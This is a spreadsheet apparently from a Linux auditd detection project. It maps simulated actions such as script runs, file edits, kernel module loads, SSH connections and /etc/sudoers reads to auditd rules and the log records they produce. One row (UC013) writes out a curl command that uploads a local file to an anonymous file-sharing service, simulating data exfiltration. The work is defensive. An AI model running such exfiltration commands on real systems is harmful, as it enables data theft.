DataSource2Log

	A	B	C	D	E	F	G	H	I
1	Data Source	Use Case #	Simulated Behavior	Ran as Root?	Auditd Rule	Record Types	Useful information	Comments	Log File

2	Command Execution	UC001	python badscript.py	No	-a always,exit -F arch=b64 -S execve -a always,exit -F arch=b32 -S execve	PROCTITLE	Contains hexed's version of command line. But trust execve for command line instead!		https://github.com/izysec/linux-audit/blob/main/LogSamples/UC001.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC001_enriched.log
3						PATH	Refers to library loading (ld.so)	More on ELFs: https://lwn.net/Articles/631631/
4						PATH	Contains binary path passed to the syscall (/usr/bin/python in our case)
5						CWD	Working directory where the action was executed
6						EXECVE	Complete command line with parameters
7						SYSCALL (execve)	Execve Syscall + parameters passed, calling user + group information, exe, process architecture, special permissions	https://man7.org/linux/man-pages/man2/execve.2.html
8		UC002	./Anotherbadscript.sh	No	-a always,exit -F arch=b64 -S execve -a always,exit -F arch=b32 -S execve	PROCTITLE	/bin/bash ./Anotherbadscript.sh		https://github.com/izysec/linux-audit/blob/main/LogSamples/UC002.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC002_enriched.log
9						PATH	Shared library load
10						PATH	/bin/bash
11						PATH	Script name
12						CWD	"
13						EXECVE	Complete command line with parameters
14						SYSCALL (execve)	The only difference with the above is the extra PATH, one for shared library load, one for /bin/bash and the last for the script. All 3 are passed are args to execve. The rest are the same.
15	File Modification	UC003	echo "New line" >> ModifyMe.txt	No	-w /home/izy/Documents/testing -p wa -k File_test	PROCTITLE	Notice how proctitle just has "bash" in it. Hence, it cannot be trusted for exact command line, trust execve for this	Open Syscall Man: https://man7.org/linux/man-pages/man2/open.2.html	https://github.com/izysec/linux-audit/blob/main/LogSamples/UC003.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC003_enriched.log
16						PATH	ModifyMe.txt (filename) and file permission (644) is mentioned
17						PATH	Directory where the modified file is located and directory permissions (775)
18						CWD	Working directory where the action was executed
19						SYSCALL (Open)	Open syscall ; calling user ; exe=/bin/bash ; mode: O_WRONLY\|O_CREAT\|O_APPEND
20		UC004	echo "New line" >> ModifyMe.txt	No	-a always,exit -F arch=b64 -S execve -a always,exit -F arch=b32 -S execve	N/A	No trace within audit.log of the echo statement nor the file the input was put into		N/A
21		UC005	vim ModifyMe.txt	No	-a always,exit -F arch=b64 -S execve -a always,exit -F arch=b32 -S execve	PROCTITLE	vim ModifyMe.txt	No indication of content changed	https://github.com/izysec/linux-audit/blob/main/LogSamples/UC005.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC005_enriched.log
22						PATH	Shared library load
23						PATH	Directory of vim
24						CWD	"
25						EXECVE	Full command line
26						SYSCALL (execve)	Execve Syscall + parameters passed, calling user + group information, exe (/usr/bin/vim.basic), process architecture, special permissions
27		UC006			-w /home/izy/Documents/testing -p wa -k File_test	PROCTITLE	Always "vim ModifyMe.txt"		https://github.com/izysec/linux-audit/blob/main/LogSamples/UC006.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC006_enriched.log
28						PATH (multiple)	The txt file with .swp, .swx, .txt~, numbers (?) - probably due to multiple temporary files made by vim
29						PATH	Directory where the modified file is located and directory permissions (775)
30						CWD	Working directory where the action was executed
31						SYSCALL (multiple)	'' + several syscalls (unlink, setxattr, chmod, open, rename, fchown)	The multiple syscalls is probably because vim creates a "temporary" file during editing
32	File Creation	UC007	touch CreatedFile.txt	No	-w /home/izy/Documents/testing/ -p wa -k File_test	PROCTITLE	touch CreatedFile.txt		https://github.com/izysec/linux-audit/blob/main/LogSamples/UC007.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC007_enriched.log
33						PATH	CreatedFile.txt, file permissions (644)
34						PATH	Directory where where the file is being touched to and directory permissions (775)
35						CWD	Working directory where the action was executed
36						SYSCALL (Open)	SYSCALL includes information about the user, access flags of the Open syscall (O_WRONLY\|O_CREAT\|O_NOCTTY\|O_NONBLOCK) and the exe that invoked the syscall (/bin/touch)
37		UC008	echo "Something bad" > Badfile.txt	No	-w /home/izy/Documents/testing/ -p wa -k File_test	PROCTITLE	proctitle=bash ; notice how calling exe is /bin/bash and there's no indication of the echo that had file content.		https://github.com/izysec/linux-audit/blob/main/LogSamples/UC008.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC008_enriched.log
38						PATH	"
39						PATH	"
40						CWD	"
41						SYSCALL (Open)	Notice the change in open syscall access flags (O_WRONLY\|O_CREAT\|O_TRUNC)
42	Module Load	UC009	root@ubuntu:/dir# insmod /lib/modules/4.15.0-142-generic/kernel/drivers/bluetooth/btusb.ko	Yes	-a always,exit -F perm=x -F auid!=-1 -F path=/sbin/insmod -k modules -a always,exit -F perm=x -F auid!=-1 -F path=/sbin/modprobe -k modules -a always,exit -F perm=x -F auid!=-1 -F path=/sbin/rmmod -k modules -a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules -a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules	N/A			N/A
43		UC010	root@ubuntu:/dir# rmmod /lib/modules/4.15.0-142-generic/kernel/drivers/bluetooth/btusb.ko	Yes					N/A
44		UC011	root@ubuntu:/lib/modules/4.15.0-142-generic/kernel/drivers/bluetooth# modprobe torture	Yes					N/A
45	Network Connection Creation	UC012	ssh izy@127.0.0.1	No	-a always,exit -F arch=b64 -S connect -F a2=16 -F success=1 -a always,exit -F arch=b32 -S connect -F a2=16 -F success=1	PROCTITLE (multiple)	First PROCTITLE contains ssh izy@127.0.0.1 ; followed by two sshd -D -R (reinitialization)	SSHD rexecutes itself on accepting a new connection to ensure execute-time randomisation	https://github.com/izysec/linux-audit/blob/main/LogSamples/UC012.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC012_enriched.log
46						SOCKADDR (multiple)	Source address (hex encoded struct SADDR) and ssh-hosted port (saddr=inet host:127.0.0.1 serv:22)
47						SYSCALL (connect)	initiating exe=/usr/sbin/sshd	https://man7.org/linux/man-pages/man2/connect.2.html
48		UC013	root@ubuntu:/dir# curl --insecure -F "file=@ModifyMe.txt" https://api.anonfiles.com/upload	Yes	-a always,exit -F arch=b64 -S connect -F a2=16 -F success=1 -a always,exit -F arch=b32 -S connect -F a2=16 -F success=1	PROCTITLE (multiple)	curl --insecure -F "file=@ModifyMe.txt" https://api.anonfiles.com/upload	Possibly more entries should there be SSL verification	https://github.com/izysec/linux-audit/blob/main/LogSamples/UC013.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC013_enriched.log
49						SOCKADDR (multiple)	Multiple entries with SADDR of localhost and remote server IP
50						SYSCALL (connect)	exe=/usr/bin/curl
51	File Access	UC014	user@ubuntu:/dir$ cat /etc/sudoers	No	-w /etc/sudoers -p rwx -k file_access	PROCTITLE	cat /etc/sudoers		https://github.com/izysec/linux-audit/blob/main/LogSamples/UC014.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC014_enriched.log
52						PATH	/etc/sudoers , file permission
53						CWD	"
54						SYSCALL (Open)	exe=/bin/cat , success=no, exit code (-13 = permission denied), mode: O_RDONLY (cat)
55		UC015	root@ubuntu:/dir# cat /etc/sudoers	Yes	-w /etc/sudoers -p rwx -k file_access	PROCTITLE	cat /etc/sudoers		https://github.com/izysec/linux-audit/blob/main/LogSamples/UC015.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC015_enriched.log
56						PATH	/etc/sudoers , file permission
57						CWD	"
58						SYSCALL (Open)	'' + success = yes, exit code = 3 (success), mode: O_RDONLY (cat), exe=/bin/cat
59	File Metadata	UC016	root@ubuntu:/dir# chmod a+x Badfile.txt	No	-w /usr/bin/chmod -p x -k	PROCTITLE	chmod a+x Badfile.txt		https://github.com/izysec/linux-audit/blob/main/LogSamples/UC016.log https://github.com/izysec/linux-audit/blob/main/LogSamples/UC016_enriched.log
60						PATH	Shared library load
61						PATH	/bin/chmod, file permission
62						CWD	"
63						EXECVE	"
64						SYSCALL	calling exe - /bin/chmod
65
66
67
68
69	Data Source	Use Case #	Simulated Behavior	Log source
70	User Account Authentication	UC017	Successful/Failed incoming SSH login	/var/log/secure.log or auth.log	/var/log/audit/audit.log
71		UC017	Successful/Failed incoming SSH login	User account, source IP, port, user uid, result	[type=USER_AUTH] User account, source IP, source hostname, uid, auid, pid, result
72		UC018	Successful/Failed Local GUI Logon	User acount, uid, result, rhost (sometimes)	You receive no explicit entries for success/failure events. If you monitor execve syscall or read events for /etc/shadow, you will see the process creation event for unix_chkpwd but this doesn't indicate if the authentication event failed/suceeded or where it came from. In other words, only files/syscalls you explicitly monitor that are touched by /sbin/unix_chkpwd will show up.
73
74					Authentication Log samples
75					https://github.com/izysec/linux-audit/blob/main/LogSamples/userauth_gui_failure_secure.log
76					https://github.com/izysec/linux-audit/blob/main/LogSamples/userauth_ssh_failure_auditd.log
77					https://github.com/izysec/linux-audit/blob/main/LogSamples/userauth_ssh_failure_secure.log
78					https://github.com/izysec/linux-audit/blob/main/LogSamples/userauth_ssh_success_auditd.log
79					https://github.com/izysec/linux-audit/blob/main/LogSamples/userauth_ssh_success_secure.log
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100